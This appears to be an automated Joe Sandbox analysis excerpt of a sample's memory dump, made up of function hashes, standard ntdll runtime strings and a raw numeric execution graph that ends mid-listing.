                                                                  • Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4ea5d7e4d5aa8a21933359e848474092e553a48ce06a621ad9649b476054942f
                                                                  • Instruction ID: 63cd3bf3e6e4982ddac8ca9d5af1d5930f6ca1d8e4896c38851dc09d5ac61936
                                                                  • Opcode Fuzzy Hash: 4ea5d7e4d5aa8a21933359e848474092e553a48ce06a621ad9649b476054942f
                                                                  • Instruction Fuzzy Hash: C0E0C2732807506BC311EF6DDE00F9E73AEEFA43A0F004121F1508BAD0CA64AC40C798
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                                  • Instruction ID: 127aeeadd4b2b364e6f033c630d52347792edba130084b09a918d42fedee535e
                                                                  • Opcode Fuzzy Hash: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                                  • Instruction Fuzzy Hash: 1CE08633111B148BC715EE54D521B6277F4FF45720F05463EA61747780C534E944C7D4
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                                  • Instruction ID: a1bfa2d53b88191df3d197123604645fac6d9187198137874b795db145d6177f
                                                                  • Opcode Fuzzy Hash: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                                  • Instruction Fuzzy Hash: 4CD05E76511B50AFC3328F1BEA00C13BBF9FBC4F10705066EA54683D20C671A846CBA0
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                  • Instruction ID: 26da922b6f7f48d025d1ba817b654382496c88fae44f97435d8509482d3d023f
                                                                  • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                  • Instruction Fuzzy Hash: 58D0A972A44720ABD7329A1CFD00FC373E9BB88720F060469B009CB550C360AC82CA84
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                  • Instruction ID: 86a028c311ba7213cfa7f46955a0a6586f6cec213ff0eb62daff84f8f7bfbe01
                                                                  • Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                  • Instruction Fuzzy Hash: 98E0EC75A507849BCF12DF59D780F5EB7F9BBA4B54F150054A1095FA60C624A901CB40
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                  • Instruction ID: cb48a8b1b2f522f4d849c8e057d8558b627f1c7c945fce8eca0505f3c3566974
                                                                  • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                  • Instruction Fuzzy Hash: 11D0223231223093CF1886506A00F737A05AB80A98F06002C790A93C00C6088CC2C2E0
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4000ca2ea61a8053215a6a5b5494adb927155a0f54c00de2ec7510a81b4adfa7
                                                                  • Instruction ID: ad4f93fa2073fea1abb6bfce5c39b2c2cfc9a74dd9e1de8b1ef75d5f15b61dc2
                                                                  • Opcode Fuzzy Hash: 4000ca2ea61a8053215a6a5b5494adb927155a0f54c00de2ec7510a81b4adfa7
                                                                  • Instruction Fuzzy Hash: 88D09E756957419FDF06CF54C664E7A7676FF14644B800078E70656920D329D902C650
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                  • Instruction ID: ee881db943395c90a8c8997d35b23c7e964b6938633b417ce644314b11d63fb0
                                                                  • Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                  • Instruction Fuzzy Hash: 63D012771D064CBBCB119F65DD01F957BA9E764BA0F444020B6048B5A0C63AE990D584
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                  • Instruction ID: 2151abd85524590d16e2bec0e713a44bb2b145aaf2027c1fc15399e70435ff2a
                                                                  • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                  • Instruction Fuzzy Hash: D7C08C73290748AFC712DF98CE01F027BA9EBA8B40F000021F3048BA70C631FC60EA84
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                  • Instruction ID: 12287a0203856fbf92cc5296637f47620953da075aab15137f33391b644b7897
                                                                  • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                  • Instruction Fuzzy Hash: 22D01236240348EFCB01DF41C990D9A776AFBD8750F509019FD19076108A31ED62DA50
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                  • Instruction ID: 7cb394dae07a7f55a51e183b651f935836baf645325805f57e20c8a1f7d5da8a
                                                                  • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                  • Instruction Fuzzy Hash: 6AC00179741B418BCF06CA2AD394B4977E4BB44740F164890E8058BA22E624E901CA11
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd
                                                                  Similarity
                                                                  • API ID: ___swprintf_l
                                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                  • API String ID: 48624451-2108815105
                                                                  • Opcode ID: fc1c61673d8e46f6c7ca043044018f8475ad529d0c53f1c47cb873b57c4b5046
                                                                  • Instruction ID: 10aa6e105f329d5fd334a4009b0d6d886964f92523cb09f1df5704685dbe1ed0
                                                                  • Opcode Fuzzy Hash: fc1c61673d8e46f6c7ca043044018f8475ad529d0c53f1c47cb873b57c4b5046
                                                                  • Instruction Fuzzy Hash: 2A51C8B6A00316AFDB10DB9889D097EF7BCBF58300B10826AE469D7A46D774DE51C7E0
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd
                                                                  Similarity
                                                                  • API ID: ___swprintf_l
                                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                  • API String ID: 48624451-2108815105
                                                                  • Opcode ID: 77b07afb1335dd3bbaa4ddd5fc50e072510a4b8d15ea998debddcf71ae527b39
                                                                  • Instruction ID: 0a0bcdaba15de9459e6f0427d5c7e48f01cebaf2a786df29d7c469f86f02fbda
                                                                  • Opcode Fuzzy Hash: 77b07afb1335dd3bbaa4ddd5fc50e072510a4b8d15ea998debddcf71ae527b39
                                                                  • Instruction Fuzzy Hash: 9E51C575E00B45AFDB20CE98CAA097FB7FDEF48200B44C659E5A9D7642E6B4DB40C760
                                                                  Strings
                                                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 22AE4742
                                                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 22AE46FC
                                                                  • Execute=1, xrefs: 22AE4713
                                                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 22AE4725
                                                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 22AE4655
                                                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 22AE4787
                                                                  • ExecuteOptions, xrefs: 22AE46A0
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                  • API String ID: 0-484625025
                                                                  • Opcode ID: de6241939210fabd5c1aa531f73c3e153868962dd515023024729f0c7b27db22
                                                                  • Instruction ID: a9be8106a1ab4b574fc4f484338ed0d8d03ce5dd9de72e8acbe05016d966f78e
                                                                  • Opcode Fuzzy Hash: de6241939210fabd5c1aa531f73c3e153868962dd515023024729f0c7b27db22
                                                                  • Instruction Fuzzy Hash: 3851D631B40319AAEB11DBA8DDB5FEF77B8BF18304F0001A9E605A7991EB719A45CB50
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd
                                                                  Similarity
                                                                  • API ID: __aulldvrm
                                                                  • String ID: +$-$0$0
                                                                  • API String ID: 1302938615-699404926
                                                                  • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                  • Instruction ID: 21978377a5ee8fa3c68c98538d52d221cdc4d0b807c3c7348953a1820bcf7bf9
                                                                  • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                  • Instruction Fuzzy Hash: 1A81C270E473498EDF04CFA8CAA1BEEBBA9BF65354F144A19DC51A7E91C7348980CB50
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd
                                                                  Similarity
                                                                  • API ID: ___swprintf_l
                                                                  • String ID: %%%u$[$]:%u
                                                                  • API String ID: 48624451-2819853543
                                                                  • Opcode ID: 08af0b55f7a79ac945a5b8a36a1acc1c5785c4e29ca85d3e948c9820747a10bb
                                                                  • Instruction ID: dce141f249234f45ba5c7577b8bb6643baaa98fc8106c720cd7d285eda59650c
                                                                  • Opcode Fuzzy Hash: 08af0b55f7a79ac945a5b8a36a1acc1c5785c4e29ca85d3e948c9820747a10bb
                                                                  • Instruction Fuzzy Hash: A3215176E00729ABDB10DE69CD40EFE77F8EF54755F440226EA09E7200E7709A418BA1
                                                                  Strings
                                                                  • RTL: Re-Waiting, xrefs: 22AE031E
                                                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 22AE02E7
                                                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 22AE02BD
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                  • API String ID: 0-2474120054
                                                                  • Opcode ID: cce85d1794bbe531064084c04da3af357ab4bcbec0cddb17092c83f5aecd0238
                                                                  • Instruction ID: db588b79cede0cc79081215ad2cfc57ec290403e7b7cc238dda497eaf0ed3615
                                                                  • Opcode Fuzzy Hash: cce85d1794bbe531064084c04da3af357ab4bcbec0cddb17092c83f5aecd0238
                                                                  • Instruction Fuzzy Hash: 73E1AC30608741DFD711CF29CA81B1AB7E0BF84318F104A69FAA9DBAE1DB75D945CB42
                                                                  Strings
                                                                  • RTL: Resource at %p, xrefs: 22AE7B8E
                                                                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 22AE7B7F
                                                                  • RTL: Re-Waiting, xrefs: 22AE7BAC
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                  • API String ID: 0-871070163
                                                                  • Opcode ID: ae441593553b2a7f670c5340d00b925643772b48438677030045af4eef8ca3ca
                                                                  • Instruction ID: ad525f334aaec81654417db025a9d3ecd226ac2baee518b593c823da3a2a5ece
                                                                  • Opcode Fuzzy Hash: ae441593553b2a7f670c5340d00b925643772b48438677030045af4eef8ca3ca
                                                                  • Instruction Fuzzy Hash: 2041B0317017429FD724CE25CE90B5AB7E5FFA8710F100A2EFA5A97A80DB31E905CB91
                                                                  APIs
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 22AE728C
                                                                  Strings
                                                                  • RTL: Resource at %p, xrefs: 22AE72A3
                                                                  • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 22AE7294
                                                                  • RTL: Re-Waiting, xrefs: 22AE72C1
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd
                                                                  Similarity
                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                  • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                  • API String ID: 885266447-605551621
                                                                  • Opcode ID: c761296816df6b3c1f80a9c8329df108209df4c7f765052872e634082f8fc8e1
                                                                  • Instruction ID: c0016ad7bad5a78198dac9a6d194ff9daa08e5a6897d5ac280c2c418099e54dd
                                                                  • Opcode Fuzzy Hash: c761296816df6b3c1f80a9c8329df108209df4c7f765052872e634082f8fc8e1
                                                                  • Instruction Fuzzy Hash: BB41D031701342ABD711CE25CD81FA6BBA5FF64714F100A29FA5AEBA80DB31E856C7D1
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd
                                                                  Similarity
                                                                  • API ID: ___swprintf_l
                                                                  • String ID: %%%u$]:%u
                                                                  • API String ID: 48624451-3050659472
                                                                  • Opcode ID: 0004421711480e59e2c973407b246b023d30bc7357bb890b95e99adc41e71be4
                                                                  • Instruction ID: 21005cff88c7a5b5b52a414c476e6159f4aecf30373921592355985f7421229d
                                                                  • Opcode Fuzzy Hash: 0004421711480e59e2c973407b246b023d30bc7357bb890b95e99adc41e71be4
                                                                  • Instruction Fuzzy Hash: 9C316472A007199FDB10CE29CE40BEE77F8EF54654F844556E94DE3240EB70AA458BA0
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd
                                                                  Similarity
                                                                  • API ID: __aulldvrm
                                                                  • String ID: +$-
                                                                  • API String ID: 1302938615-2137968064
                                                                  • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                  • Instruction ID: 2c0663d4a1a2ba9750daba0692475cadb74236f43837732a757b4e9aadfdd125
                                                                  • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                  • Instruction Fuzzy Hash: 1E91C272E003198EDB10CF69CEC4BEEB7A9BF64764F50461AE951EBAC1D7B08940CB14
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $$@
                                                                  • API String ID: 0-1194432280
                                                                  • Opcode ID: bb872f4be797e252c6e2dfadc298582d963f8799c4169a2cb12a05f50d15f123
                                                                  • Instruction ID: 4d820579326aa497c7b86aea258151eef20422bf84af885214812098b9ee1a53
                                                                  • Opcode Fuzzy Hash: bb872f4be797e252c6e2dfadc298582d963f8799c4169a2cb12a05f50d15f123
                                                                  • Instruction Fuzzy Hash: 5E813972D003699BDB318B54CD44BEEB7B4BF08754F0041EAAA19B7680E7745E84CFA5

                                                                  Execution Graph

                                                                  Execution Coverage:8.5%
                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                  Signature Coverage:0%
                                                                  Total number of Nodes:1478
                                                                  Total number of Limit Nodes:13
                                                                  execution_graph 26156 2cdbb44 26159 2ccec74 26156->26159 26158 2cdbb4c 26160 2ccec7c 26159->26160 26160->26160 27606 2cc870c 26160->27606 26162 2ccec9e 26163 2cceca3 26162->26163 26164 2cced28 26163->26164 27612 2cc8824 26164->27612 26166 2cced3b 26167 2cced8c 26166->26167 26168 2cc8824 3 API calls 26167->26168 26169 2cced9f 26168->26169 26170 2ccedf0 26169->26170 26171 2ccedfa 26170->26171 26172 2cc8824 3 API calls 26171->26172 26173 2ccee03 26172->26173 26174 2ccee5e 26173->26174 26175 2cc8824 3 API calls 26174->26175 26176 2ccee67 26175->26176 26177 2cceec2 26176->26177 26178 2cc8824 3 API calls 26177->26178 26179 2cceecb 26178->26179 26180 2cceee9 26179->26180 26181 2ccef26 26180->26181 26182 2cc8824 3 API calls 26181->26182 26183 2ccef2f 26182->26183 26184 2cc8824 3 API calls 26183->26184 26185 2ccef93 26184->26185 26186 2ccef98 26185->26186 26187 2ccefa0 26186->26187 27605 2cdaa23 26186->27605 27620 2ccebf0 26187->27620 26189 2ccefa5 26190 2cc8824 3 API calls 26189->26190 26189->27605 26191 2ccefd4 26190->26191 26192 2cceff2 26191->26192 26193 2cc8824 3 API calls 26192->26193 26194 2cceffb 26193->26194 26195 2cc8824 3 API calls 26194->26195 26196 2ccf02e 26195->26196 26197 2ccf067 26196->26197 26198 2ccf09e 26197->26198 26199 2cc8824 3 API calls 26198->26199 26200 2ccf0aa 26199->26200 26201 2cc8824 3 API calls 26200->26201 26202 2ccf0dd 26201->26202 26203 2cc8824 3 API calls 26202->26203 26204 2ccf110 26203->26204 26205 2cc8824 3 API calls 26204->26205 26206 2ccf143 26205->26206 26207 2ccf164 26206->26207 26208 2ccf17c 26207->26208 26209 2ccf1a6 26208->26209 26210 2cc8824 3 API calls 26209->26210 26211 2ccf1bf 26210->26211 26212 2ccf1f8 26211->26212 26213 2ccf217 26212->26213 26214 2ccf222 26213->26214 26215 2cc8824 3 API calls 26214->26215 26216 2ccf23b 26215->26216 26217 2cc8824 3 API calls 26216->26217 26218 2ccf26e 26217->26218 26219 2ccf27e 26218->26219 26220 2cc8824 3 API calls 26219->26220 26221 2ccf2a1 26220->26221 26222 2cc8824 3 API calls 26221->26222 26223 2ccf2d4 26222->26223 26224 2ccf300 26223->26224 26225 2ccf32c 26224->26225 26226 2cc8824 3 API calls 26225->26226 26227 2ccf350 26226->26227 26228 2cc8824 3 API calls 26227->26228 26229 2ccf383 26228->26229 26230 2ccf3aa 26229->26230 26231 2cc8824 3 API calls 26230->26231 26232 2ccf3b6 26231->26232 26233 2cc8824 3 API calls 26232->26233 26234 2ccf3e9 26233->26234 26235 2ccf40a 26234->26235 26236 2ccf415 26235->26236 26237 2ccf422 26236->26237 26238 2cc8824 3 API calls 26237->26238 26239 2ccf465 26238->26239 26240 2ccf491 26239->26240 26241 2ccf4c8 26240->26241 26242 2cc8824 3 API calls 26241->26242 26243 2ccf4e1 26242->26243 26244 2ccf508 26243->26244 26245 2cc8824 3 API calls 26244->26245 26246 2ccf514 26245->26246 26247 2ccf53b 26246->26247 26248 2cc8824 3 API calls 26247->26248 26249 2ccf547 26248->26249 26250 2cc8824 3 API calls 26249->26250 26251 2ccf57a 26250->26251 26252 2ccf5b3 26251->26252 26253 2cc8824 3 API calls 26252->26253 26254 2ccf5f6 26253->26254 26255 2ccf62f 26254->26255 26256 2cc8824 3 API calls 26255->26256 26257 2ccf672 26256->26257 26258 2ccf693 26257->26258 26259 2ccf6ab 26258->26259 26260 2cc8824 3 API calls 26259->26260 26261 2ccf6ee 26260->26261 26262 2ccf70f 26261->26262 26263 2ccf727 26262->26263 26264 2cc8824 3 API calls 26263->26264 26265 2ccf76a 26264->26265 26266 2ccf779 26265->26266 26267 2ccf7a3 26266->26267 26268 2ccf7df 26267->26268 26269 2ccf80b 26268->26269 26270 2ccf823 26269->26270 26271 2cc8824 3 API calls 26270->26271 26272 2ccf82f 26271->26272 26273 2ccf850 26272->26273 26274 2ccf85b 26273->26274 26275 2ccf887 26274->26275 26276 2ccf89f 26275->26276 26277 2cc8824 3 API calls 26276->26277 26278 2ccf8ab 26277->26278 26279 2ccf8cc 26278->26279 26280 2ccf8d4 26279->26280 26281 2ccf9e1 26279->26281 26282 2ccf8f5 26280->26282 26283 2ccfa0d 26281->26283 26284 2ccf92c 26282->26284 26285 2ccfa39 26283->26285 26287 2cc8824 3 API calls 26284->26287 26286 2cc8824 3 API calls 26285->26286 26288 2ccfa5d 26286->26288 26289 2ccf950 26287->26289 26291 2ccfab5 26288->26291 26290 2ccf9a8 26289->26290 26293 2cc8824 3 API calls 26290->26293 26292 2cc8824 3 API calls 26291->26292 26294 2ccf9cc 26292->26294 26293->26294 26295 2ccfb1a 26294->26295 26296 2ccfb32 26295->26296 26297 2ccfb51 26296->26297 26298 2cc8824 3 API calls 26297->26298 26299 2ccfb75 26298->26299 26300 2ccfbae 26299->26300 26301 2ccfbcd 26300->26301 26302 2ccfbd8 26301->26302 26303 2cc8824 3 API calls 26302->26303 26304 2ccfbf1 26303->26304 26305 2ccfc28 26304->26305 26306 2ccfc41 26305->26306 26307 2ccfc62 26306->26307 26308 2ccfc7a 26307->26308 26309 2cc8824 3 API calls 26308->26309 26310 2ccfcbd 26309->26310 26311 2ccfcde 26310->26311 26312 2ccfce9 26311->26312 26313 2ccfcf6 26312->26313 26314 2cc8824 3 API calls 26313->26314 26315 2ccfd39 26314->26315 26316 2ccfd65 26315->26316 26317 2ccfd72 26316->26317 26318 2cc8824 3 API calls 26317->26318 26319 2ccfdb5 26318->26319 26320 2ccfde1 26319->26320 26321 2ccfdee 26320->26321 26322 2cc8824 3 API calls 26321->26322 26323 2ccfe31 26322->26323 26324 2ccfe51 26323->26324 26325 2ccfe7d 26324->26325 26326 2ccfea9 26325->26326 26327 2cc8824 3 API calls 26326->26327 26328 2ccfecd 26327->26328 26329 2ccfeee 26328->26329 26330 2ccff06 26329->26330 26331 2ccff25 26330->26331 26332 2ccff30 26331->26332 26333 2cc8824 3 API calls 26332->26333 26334 2ccff49 26333->26334 26335 2ccff6a 26334->26335 26336 2ccff82 26335->26336 26337 2ccffa1 26336->26337 26338 2ccffac 26337->26338 26339 2cc8824 3 API calls 26338->26339 26340 2ccffc5 26339->26340 26341 2ccffcf 26340->26341 26342 2ccffe7 26341->26342 26343 2ccffef 26342->26343 26344 2cd07ab 26342->26344 26345 2cd0010 26343->26345 26347 2cd07d7 26344->26347 26346 2cd001b 26345->26346 26350 2cd0028 26346->26350 26348 2cd080e 26347->26348 26349 2cd081b 26348->26349 26351 2cc8824 3 API calls 26349->26351 26352 2cc8824 3 API calls 26350->26352 26353 2cd0827 26351->26353 26354 2cd006b 26352->26354 26356 2cd0853 26353->26356 26355 2cd008c 26354->26355 26357 2cd0097 26355->26357 26359 2cd0860 26356->26359 26358 2cd00a4 26357->26358 26361 2cd00c3 26358->26361 26360 2cd088a 26359->26360 26362 2cd0897 26360->26362 26363 2cc8824 3 API calls 26361->26363 26364 2cc8824 3 API calls 26362->26364 26366 2cd00e7 26363->26366 26365 2cd08a3 26364->26365 26368 2cd08cf 26365->26368 26367 2cd0108 26366->26367 26369 2cd0113 26367->26369 26370 2cd08dc 26368->26370 26371 2cd0120 26369->26371 26372 2cd08fb 26370->26372 26373 2cd013f 26371->26373 26375 2cd0913 26372->26375 26374 2cd014a 26373->26374 26376 2cc8824 3 API calls 26374->26376 26377 2cc8824 3 API calls 26375->26377 26378 2cd0163 26376->26378 26379 2cd091f 26377->26379 26381 2cd0174 26378->26381 26380 2cd0941 26379->26380 26382 2cd0951 